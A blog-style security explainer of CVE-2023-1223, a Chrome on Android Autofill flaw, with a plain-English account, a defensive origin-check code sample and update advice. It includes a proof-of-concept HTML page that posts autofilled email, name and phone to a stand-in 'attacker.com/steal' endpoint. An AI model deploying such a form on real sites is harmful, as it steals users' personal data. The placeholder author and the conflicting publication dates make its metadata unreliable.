*Published: June 2024*
*Severity: Medium (Chromium rating)*
*Affected: Chrome on Android < 111.0.5563.64*
*Author: [Your Name]*
When you think about your web browser, you trust it to keep your data separate and secure—even as you jump between logins, tabs, and sites. But in early 2023, security researchers discovered a hole in the way Google Chrome on Android handled Autofill. This flaw, CVE-2023-1223, made it possible for a remote attacker to leak information from another website using only a maliciously crafted HTML page.
Here’s a plain-English explanation, technical breakdown, code examples, and a practical view of how attackers abused this issue.
What Is CVE-2023-1223?
CVE-2023-1223 is an "insufficient policy enforcement in Autofill in Google Chrome on Android." Before version 111.0.5563.64, it let a remote attacker leak cross-origin data—that is, data belonging to a different website origin—by tricking the browser with a sneaky web page. It’s a classic example of how browser features can sometimes open the door for privacy breaches if not carefully designed.
Original Advisory
- Chromium Bug 1253698
- Chrome Releases Blog
The Big Risk: What Could Attackers Do?
If you visited a website controlled by a hacker, that site could design forms in such a way that Chrome’s Autofill would leak information from another site—think email addresses, usernames, even saved passwords (though Chrome takes more precautions with passwords).
All of this could happen without you realizing anything is wrong. The attacker could then grab your personal data and use it for phishing, identity theft, or simply to sell to the highest bidder.
Let’s break down the root cause
- Chrome’s Autofill is meant to quickly fill forms with your info, but it’s supposed to do this only on sites that have the right to use it (like login forms on trusted sites).
- However, in affected versions, Chrome on Android didn’t enforce the correct origin policy tightly enough. That means a malicious site could present a form crafted to look like a trusted site’s form and trick Chrome into autofilling the user’s sensitive information, even though the browser shouldn’t share that data outside the original context.
malicious.html

```html
<!-- This could be hosted on attacker.com -->
<!DOCTYPE html>
<html>
<body>
<form id="leakyForm" action="https://attacker.com/steal">
  <!-- Crafted so Chrome thinks this is a form for Autofill (e.g., matches input names for common sites) -->
  <input name="email" autocomplete="email">
  <input name="name" autocomplete="name">
  <input name="phone" autocomplete="tel">
  <!-- Submits form data via JavaScript -->
  <button type="button" onclick="submitForm()">Steal Data</button>
</form>
<script>
function submitForm() {
  // Force submission of whatever Chrome autofilled
  document.getElementById('leakyForm').submit();
}
</script>
</body>
</html>
```
How it’s exploited:
1. You visit attacker.com on your Android phone using Chrome (before v111).
2. The page presents a form whose field names and autocomplete tokens mimic those of a trusted site, like your bank or email.
3. Chrome, lacking strict checks, autofills your sensitive information into the attacker’s form.
4. As you click the button—or automatically through script—the stolen info gets sent to the attacker’s server.
> Note: The real-world exploit would involve more tricks to hide the process and encourage Autofill, but this is the gist.
Why Was the Policy Insufficient?
Browsers have strict rules (Same-Origin Policy) to keep data separated between sites. In Chrome for Android, before the patch, these rules weren’t enforced tightly enough on the Autofill triggers for forms. Normally, only pages with the same origin as the stored credentials are supposed to get autofilled; a loophole in Chrome made it possible otherwise.
- Autofill is now only triggered when a page’s origin matches the one for the saved data.
- Extra checks ensure cross-origin attacks can’t grab your info, even if the form fields are crafted to look similar.
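To make the origin check concrete, here is an added example (not Chromium’s code) of a minimal autofill gate that keys saved profiles by origin and refuses to fill any form whose origin differs. The bank.example profile and the attacker.com form are constructed sample data; the example also covers framed forms and look-alike hostnames, which goes a little beyond what the release notes say.

```javascript
// Added example: origin-gated Autofill, modelled on the fix described above.
// Saved data is keyed by the origin it was captured on. A form is filled only
// when its own document origin (and, if it is framed, the top-level origin)
// equals that key. Field names and autocomplete tokens never influence this.

// Origin = scheme + host + port, as the Same-Origin Policy defines it.
function originOf(url) {
  try {
    const u = new URL(url);
    if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
    return u.origin;
  } catch (e) {
    return null; // an unparsable URL matches nothing
  }
}

// Constructed sample of saved Autofill profiles (hypothetical data).
const SAVED = [
  { origin: 'https://bank.example',
    values: { email: 'alice@example.net', tel: '+15550000000' } },
];

// Decide which saved values a form may receive.
// form = { documentUrl, topUrl (optional, for framed forms),
//          fields: [{ autocomplete: 'email' | 'tel' | ... }] }
function autofillFor(form) {
  const frameOrigin = originOf(form.documentUrl);
  const topOrigin = form.topUrl ? originOf(form.topUrl) : frameOrigin;
  if (!frameOrigin || !topOrigin) return {};
  // Hardened rule: every origin involved must equal the saved origin.
  // The pre-patch weakness was, in effect, trusting the form's shape instead.
  const entry = SAVED.find(e => e.origin === frameOrigin && e.origin === topOrigin);
  if (!entry) return {};
  const out = {};
  for (const f of form.fields) {
    if (Object.prototype.hasOwnProperty.call(entry.values, f.autocomplete)) {
      out[f.autocomplete] = entry.values[f.autocomplete];
    }
  }
  return out;
}

// The malicious.html form above, rendered on attacker.com, gets nothing.
autofillFor({ documentUrl: 'https://attacker.com/malicious.html',
              fields: [{ autocomplete: 'email' }, { autocomplete: 'tel' }] });
```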
Full details in Google’s release notes.
References & Further Reading
- Chromium Security Advisory (CVE-2023-1223)
- Chromium Bug 1253698 (full timeline)
- Same-Origin Policy Explained (MDN)
- Autofill in Chrome Docs
Final Thoughts
CVE-2023-1223 is a textbook lesson: even “helpful” features like Autofill can turn dangerous if not locked down. Always keep your browser up-to-date and think twice before letting it save or autofill important info. Attackers are always hunting for these gaps—let’s stay one step ahead.
*Stay secure, and share this with friends who might still be running older Chrome versions on Android!*
Timeline
Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/11/2023 02:38:00 UTC